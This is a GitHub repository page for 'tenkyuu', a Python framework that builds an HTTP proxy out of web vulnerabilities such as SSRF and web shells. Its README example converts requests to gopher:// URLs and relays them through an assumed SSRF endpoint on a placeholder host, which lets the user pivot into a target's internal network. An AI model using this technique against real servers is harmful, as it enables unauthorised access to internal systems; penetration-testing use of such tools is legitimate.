Skip to content
/ tenkyuu Public

A framework to create HTTP Proxy through web vulnerabilities.

License

Apache-2.0 license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

fressive/tenkyuu

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
examples
examples
 
 
tests
tests
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
tenkyuu.py
tenkyuu.py
 
 

Repository files navigation

Tenkyuu

A framework to create a HTTP Proxy through web vulnerabilities (SSRF, WebShell, etc.) quickly.

Usage

Firstly, install the package from pypi.

pip install tenkyuu

Then code your proxy rules. For example:

from tenkyuu import Tenkyuu, internal_server_error
import requests

app = Tenkyuu(verbose = True)

def ssrf_proxy(req):
    # The req param is an object that contains the information of HTTP Request(s)

    # The req.gopherize() function will convert HTTP Request Packet 
    # to `gopher://...` protocol automatically
    gopherized_url = req.gopherize() 
    
    # Assume that the server has a ssrf vulnerability entrance
    # and supports gopher:// protocol, responsing with data 
    # in JSON format
    resp = requests.get("https://vulnerable.com/ssrf.php", params = {
        "url": gopherized_url
    }).json()

    if resp["status"] != "OK":
        return internal_server_error()

    return resp["data"]

if __name__ == "__main__":
    app.run(
        handler = ssrf_proxy,
        host = "127.0.0.1", 
        port = 8088
    )

Run the script and set your HTTP Proxy to 127.0.0.1:8088 in the application you will use.

License

Apache License

About

A framework to create HTTP Proxy through web vulnerabilities.

Resources

Readme

License

Apache-2.0 license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages